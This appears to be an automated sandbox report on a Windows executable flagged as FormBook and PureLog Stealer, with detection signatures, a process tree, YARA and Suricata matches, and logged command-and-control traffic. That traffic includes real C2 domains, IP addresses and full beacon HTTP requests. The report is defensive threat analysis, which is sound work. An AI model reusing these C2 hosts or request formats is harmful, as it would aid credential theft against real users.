Windows Analysis Report
QsBdpe1gK5.exe

Overview

General Information

Sample name: QsBdpe1gK5.exe (renamed because original name is a hash value)
Original sample name: 2b7153bd3b38f85441844e5b9eb277b441357b5725adf4505e8631f6d34d0606.exe
Analysis ID: 1589101
MD5: 4bc2f58c4ac26d5d012f166d263d3b72
SHA1: 91d3241e1edf478dae9ba4d2731079d70f8100b7
SHA256: 2b7153bd3b38f85441844e5b9eb277b441357b5725adf4505e8631f6d34d0606
Tags: exe, Formbook, user-adrian__luca

Detection

FormBook, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
Yara detected PureLog Stealer
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • QsBdpe1gK5.exe (PID: 7252 cmdline: "C:\Users\user\Desktop\QsBdpe1gK5.exe" MD5: 4BC2F58C4AC26D5D012F166D263D3B72)
    • QsBdpe1gK5.exe (PID: 7400 cmdline: "C:\Users\user\Desktop\QsBdpe1gK5.exe" MD5: 4BC2F58C4AC26D5D012F166D263D3B72)
      • oPkpFmCiYVL.exe (PID: 5016 cmdline: "C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • find.exe (PID: 7556 cmdline: "C:\Windows\SysWOW64\find.exe" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
          • oPkpFmCiYVL.exe (PID: 4588 cmdline: "C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7880 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000002.00000002.1841761840.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000004.00000002.4126273747.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000008.00000002.4129375797.0000000005340000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000004.00000002.4126207300.0000000002B60000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000000.00000002.1698119849.00000000041B9000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

Source | Rule | Description | Author | Strings
0.2.QsBdpe1gK5.exe.41d24c8.2.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.2.QsBdpe1gK5.exe.7c40000.5.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.2.QsBdpe1gK5.exe.7c40000.5.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
2.2.QsBdpe1gK5.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0.2.QsBdpe1gK5.exe.41d24c8.2.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-11T09:36:21.767422+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 15.197.142.173 | 80 | TCP
2025-01-11T09:36:45.094735+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49745 | 104.21.80.1 | 80 | TCP
2025-01-11T09:37:06.343691+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49803 | 13.248.169.48 | 80 | TCP
2025-01-11T09:37:19.665181+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49937 | 173.0.157.187 | 80 | TCP
2025-01-11T09:37:49.081500+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50024 | 13.248.169.48 | 80 | TCP
2025-01-11T09:38:03.309833+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50028 | 38.47.233.4 | 80 | TCP
2025-01-11T09:38:16.641140+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50032 | 199.192.23.123 | 80 | TCP
2025-01-11T09:38:29.971877+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50036 | 104.21.36.239 | 80 | TCP
2025-01-11T09:38:44.008084+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50040 | 208.91.197.27 | 80 | TCP
2025-01-11T09:38:58.165890+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50044 | 13.248.169.48 | 80 | TCP
2025-01-11T09:39:11.812195+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50048 | 54.67.42.145 | 80 | TCP
2025-01-11T09:39:25.214471+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50052 | 193.180.209.15 | 80 | TCP
2025-01-11T09:39:39.185113+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50056 | 208.91.197.27 | 80 | TCP
2025-01-11T09:39:52.587233+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50060 | 104.21.88.139 | 80 | TCP
2025-01-11T09:40:01.576894+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50061 | 15.197.142.173 | 80 | TCP
2025-01-11T09:40:14.834725+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50065 | 104.21.80.1 | 80 | TCP
2025-01-11T09:40:27.958740+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50069 | 13.248.169.48 | 80 | TCP

                      AV Detection

                      Source: QsBdpe1gK5.exe, Virustotal: Detection: 80%
                      Source: QsBdpe1gK5.exe, ReversingLabs: Detection: 87%
                      Source: Yara matchFile source: 2.2.QsBdpe1gK5.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.QsBdpe1gK5.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.1841761840.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.4126273747.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.4129375797.0000000005340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.4126207300.0000000002B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1849388475.0000000001460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.4125975630.00000000008A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1850179249.0000000001570000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.4126980788.0000000002B90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
                      Source: QsBdpe1gK5.exeJoe Sandbox ML: detected
                      Source: QsBdpe1gK5.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: QsBdpe1gK5.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: dAwj.pdbSHA256 source: find.exe, 00000004.00000002.4128433138.00000000036AC000.00000004.10000000.00040000.00000000.sdmp, oPkpFmCiYVL.exe, 00000008.00000002.4127340747.0000000002F0C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2142201848.000000000C92C000.00000004.80000000.00040000.00000000.sdmp, QsBdpe1gK5.exe
                      Source: Binary string: find.pdb source: QsBdpe1gK5.exe, 00000002.00000002.1842189389.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, oPkpFmCiYVL.exe, 00000003.00000002.4126594257.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: oPkpFmCiYVL.exe, 00000003.00000000.1767735711.0000000000B8E000.00000002.00000001.01000000.0000000C.sdmp, oPkpFmCiYVL.exe, 00000008.00000002.4126367984.0000000000B8E000.00000002.00000001.01000000.0000000C.sdmp
                      Source: Binary string: wntdll.pdbUGP source: QsBdpe1gK5.exe, 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, find.exe, 00000004.00000002.4127620536.0000000003080000.00000040.00001000.00020000.00000000.sdmp, find.exe, 00000004.00000003.1850711530.0000000002ECD000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000004.00000002.4127620536.000000000321E000.00000040.00001000.00020000.00000000.sdmp, find.exe, 00000004.00000003.1841756637.0000000002D06000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: QsBdpe1gK5.exe, QsBdpe1gK5.exe, 00000002.00000002.1842714002.00000000010C0000.00000040.00001000.00020000.00000000.sdmp, find.exe, find.exe, 00000004.00000002.4127620536.0000000003080000.00000040.00001000.00020000.00000000.sdmp, find.exe, 00000004.00000003.1850711530.0000000002ECD000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000004.00000002.4127620536.000000000321E000.00000040.00001000.00020000.00000000.sdmp, find.exe, 00000004.00000003.1841756637.0000000002D06000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: find.pdbGCTL source: QsBdpe1gK5.exe, 00000002.00000002.1842189389.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, oPkpFmCiYVL.exe, 00000003.00000002.4126594257.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: dAwj.pdb source: find.exe, 00000004.00000002.4128433138.00000000036AC000.00000004.10000000.00040000.00000000.sdmp, oPkpFmCiYVL.exe, 00000008.00000002.4127340747.0000000002F0C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2142201848.000000000C92C000.00000004.80000000.00040000.00000000.sdmp, QsBdpe1gK5.exe
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4_2_008BC7D0 FindFirstFileW,FindNextFileW,FindClose,4_2_008BC7D0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4x nop then xor eax, eax4_2_008A9E70
                      Source: C:\Windows\SysWOW64\find.exeCode function: 4x nop then mov ebx, 00000004h4_2_02FA04D8

                      Networking

                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49741 -> 15.197.142.173:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49803 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49745 -> 104.21.80.1:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49937 -> 173.0.157.187:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50024 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50036 -> 104.21.36.239:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50040 -> 208.91.197.27:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50032 -> 199.192.23.123:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50052 -> 193.180.209.15:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50060 -> 104.21.88.139:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50056 -> 208.91.197.27:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50028 -> 38.47.233.4:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50044 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50048 -> 54.67.42.145:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50065 -> 104.21.80.1:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50061 -> 15.197.142.173:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50069 -> 13.248.169.48:80
                      Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                      Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
                      Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                      Source: Joe Sandbox ViewASN Name: ERI-ASUS ERI-ASUS
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /zxe0/?sTS=El+NSyicP5BK/60Db2Xg1o31Ym1kL1m1F+D0aleaH+wp2K9lM+jEhQu4F5Y51N1X01h2I0uJ1YrEHciK2w5TkDzccLdwJ4YQfOICjey7dRE9nJA6OdtOGEU=&fd=Cr_TAhTpvZaLf HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.dojodigitize.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                      Source: global trafficHTTP traffic detected: GET /vfw3/?sTS=rqg4sojPN1HzbyOnDHJ3Cr7oIHIM290cauZgTy6bg/7NgADr7OmLN934TwPzSFzjuedcHscZgYNpl4RBVJqUXd9S1SYp7SdNfp3f2O4BoE1UQty0MmYBNPM=&fd=Cr_TAhTpvZaLf HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.masterqq.proConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                      Source: global trafficHTTP traffic detected: GET /ve8l/?fd=Cr_TAhTpvZaLf&sTS=2CD4NCzEaM98tRHxByL6CBkb+r1SrLrNZhOfTEabPOsm5z4GKvQfPi2Ic9iPSKmuH0LkAH7bJGGmIcrctbsX23D3J9NSlYassghIEyGyoqU/M/j1A+InoJ8= HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.hasan.cloudConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                      Source: global trafficHTTP traffic detected: GET /5m3m/?sTS=sewIB7u3B3NHgPpecNRVGRfHaR4xptSr2ssF1/N7S59PV2pKHs5HlxSNSrXn1+DkcB7Gvkqs+bGSNPZzMS9ekzKmes/Xrk63tnUiEwK+oMVFTyGd1xnpI1E=&fd=Cr_TAhTpvZaLf HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.0be.infoConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                      Source: global trafficHTTP traffic detected: GET /r99d/?sTS=ksK/jUMQwoE3w4qDzm/qv01bg55PF/RmojthsfhnWNNbCeiLSUgY3hP8WR6lQk2TH0Mmbs+eW9ZNK4MyNm4idscl/ZtmhgZI2+0bahWoqT3AjAY6wh2Hxmo=&fd=Cr_TAhTpvZaLf HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.ssps.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                      Source: global trafficHTTP traffic detected: GET /fqrq/?sTS=Y0cHWYGzbrmggkpfvJxXUOlrVtzgTlaz5SpuxjzPWz583Z1p+HcVA7FQEFnwJzFb+2T9MdMSTUdI8uj8DHEKh+4z5Ml02qUNdUfINiCsx6tEm640t8Frn4Y=&fd=Cr_TAhTpvZaLf HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.qqc5.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                      Source: global trafficHTTP traffic detected: GET /6npp/?sTS=jlm9uKJBzKMSKltpVchdAcfiLn2XLMvveDKXZTqGsHNtP0MrAi/8oe7gvYTD+ahEZPaxXoJGvNi0UKW4HyzdiVCn0xvmy+fGUin5LDmJal6tlMrzh8MM5dQ=&fd=Cr_TAhTpvZaLf HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.learnnow.infoConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                      Source: global trafficHTTP traffic detected: GET /eln6/?sTS=dR5Y3aKNW3l55kUMNVrLYxm/K9ThMGgB73Jn5o4FF8VATzcLQGkwEffEVFziLlDWg39FgTTosOgM31CCD8Gpd/kFlGTTehU6/lxZCa6BP/PSovIsDoNSFVQ=&fd=Cr_TAhTpvZaLf HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.goldbracelet.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                      Source: global trafficHTTP traffic detected: GET /1y0g/?sTS=IEuRIrUs/61ernzXW8DdDQ7UXMybyf23DCiGM7fBggrgjt9jf+N1tpys90b5qRt+HznRgPSmLqw7b0RWB/MNeeBm+a+pfpebFy1eZZqf08c6FVwESRpxQuE=&fd=Cr_TAhTpvZaLf HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.regislemberthe.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                      Source: global trafficHTTP traffic detected: GET /c8xp/?sTS=l2hePdG2jE2F6AlFvQqInUM+71snQK+liE9tGVtIaiFMA3WO/t2DJG5mtSw4Uv/mQsI3gW77r9LMmz2KJVksCggp8HSVbW+G3kXwep+YaDI6dKKwGN8DY44=&fd=Cr_TAhTpvZaLf HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.honk.cityConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                      Source: global trafficHTTP traffic detected: GET /t3a1/?fd=Cr_TAhTpvZaLf&sTS=lPY12PoV4Qu/vhxdPmr863TaLMXXpQ43UbOQjSvNRb0mvGBHituRHrNfT9/xpia5xYCwJL1ofkUI7HJ5t37uE1B48htAcHyBpMzkQSoug0pxqUZhndEiNFY= HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.gupiao.betConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                      Source: global trafficHTTP traffic detected: GET /plc2/?sTS=sjJIcM7rXxnPrFloQUd7uRIIOfMaVKcO2uhZ3WrFd6iw+5UGAWLmyTv1SrcKmKBFl4Y89PiFDrVpBQFB+L6IBSCA24gjnVcGyQtTEi1HcJTxVdLPUB56JMc=&fd=Cr_TAhTpvZaLf HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.fengzheng.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                      Source: global trafficHTTP traffic detected: GET /9pyp/?sTS=/jnQvNiesFQPp+Sr+qvu3BcQPRo0em6f7Q4t/avNQHldTt5geLOnsXFtMBLfdtd6me/HPN9T8yryju1POCks88Xo3NK0HfOsZ2ntIEnTG3MwtjQxG1je1c4=&fd=Cr_TAhTpvZaLf HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.joeltcarpenter.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                      Source: global trafficHTTP traffic detected: GET /rm8a/?sTS=D6HNS+3OA9WxuB6ixfDf8ScOMqf60XWg1eRGn1U3pQm4dbrOXbziEv17YWBDjG9YL3PgZ6NF0eFX/SB1L/rjn2byVNbXQbqI29dbukDAFIdClQ55cQRWn7Y=&fd=Cr_TAhTpvZaLf HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.incgruporxat.clickConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                      Source: global trafficDNS traffic detected: DNS query: www.dojodigitize.shop
                      Source: global trafficDNS traffic detected: DNS query: www.masterqq.pro
                      Source: global trafficDNS traffic detected: DNS query: www.hasan.cloud
                      Source: global trafficDNS traffic detected: DNS query: www.0be.info
                      Source: global trafficDNS traffic detected: DNS query: www.tageting.shop
                      Source: global trafficDNS traffic detected: DNS query: www.ulojenukw.shop
                      Source: global trafficDNS traffic detected: DNS query: www.ssps.shop
                      Source: global trafficDNS traffic detected: DNS query: www.qqc5.top
                      Source: global trafficDNS traffic detected: DNS query: www.learnnow.info
                      Source: global trafficDNS traffic detected: DNS query: www.goldbracelet.top
                      Source: global trafficDNS traffic detected: DNS query: www.regislemberthe.online
                      Source: global trafficDNS traffic detected: DNS query: www.honk.city
                      Source: global trafficDNS traffic detected: DNS query: www.gupiao.bet
                      Source: global trafficDNS traffic detected: DNS query: www.fengzheng.shop
                      Source: global trafficDNS traffic detected: DNS query: www.joeltcarpenter.online
                      Source: global trafficDNS traffic detected: DNS query: www.incgruporxat.click
                      Source: unknownHTTP traffic detected: POST /vfw3/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.masterqq.proCache-Control: no-cacheContent-Length: 200Connection: closeContent-Type: application/x-www-form-urlencodedOrigin: http://www.masterqq.proReferer: http://www.masterqq.pro/vfw3/User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: awselb/2.0Date: Sat, 11 Jan 2025 08:36:21 GMTContent-Length: 0Connection: closeWAFRule: 5
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 08:36:37 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L9ymb4KrvUeLVcVZlhQFieLHHevruRqxD9R18QK2tUUi5e17NXSRR1gKvD%2Fx7zGFlpDt%2F7zh2wIa6bhHH9iwZCSjN2XpCAFsRotct7dxe4FQOaNhDem6C6c52NzuRXh9bhjm"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90039484caad43ee-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1700&min_rtt=1700&rtt_var=850&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=702&delivery_rate=0&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 77 b2 29 ea 81 c3 6a 25 68 52 b5 52 28 11 b8 07 8e 06 6f e5 4a 6d 9c d8 5b 22 fe 1e 25 15 12 d7 99 37 a3 19 ba ab 5e d7 f6 a3 ad 61 6b 5f 1a 68 0f cf cd 6e 0d 8b 7b c4 5d 6d 37 88 95 ad 6e ce 43 51 22 d6 fb 05 1b 0a 7a 39 33 05 71 9e 0d e9 49 cf c2 ab 72 05 fb a8 b0 89 d7 ce 13 de 44 43 38 43 f4 19 fd cf 94 5b f2 3f 26 2c d9 50 cf 36 08 24 19 ae 92 55 3c 1c de 1a 18 5d 86 2e 2a 1c 27 0e 62 07 1a 4e 19 b2 a4 6f 49 05 61 3f 35 25 36 e4 bc 4f 92 33 3f f5 ee 2b 08 bc cf 00 38 85 71 1c 8b 8b cb 2a 69 18 8a 3e 45 68 63 52 78 2c 09 ff 22 86 70 de 44 38 7f f9 05 00 00 ff ff e3 02 00 2a 59 1a 36 06 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e0LN0Dw)j%hRR(oJm["%7^ak_hn{]m7nCQ"z93qIrDC8C[?&,P6$U<].*'bNoIa?5%6O3?+8q*i>EhcRx,"pD8*Y60
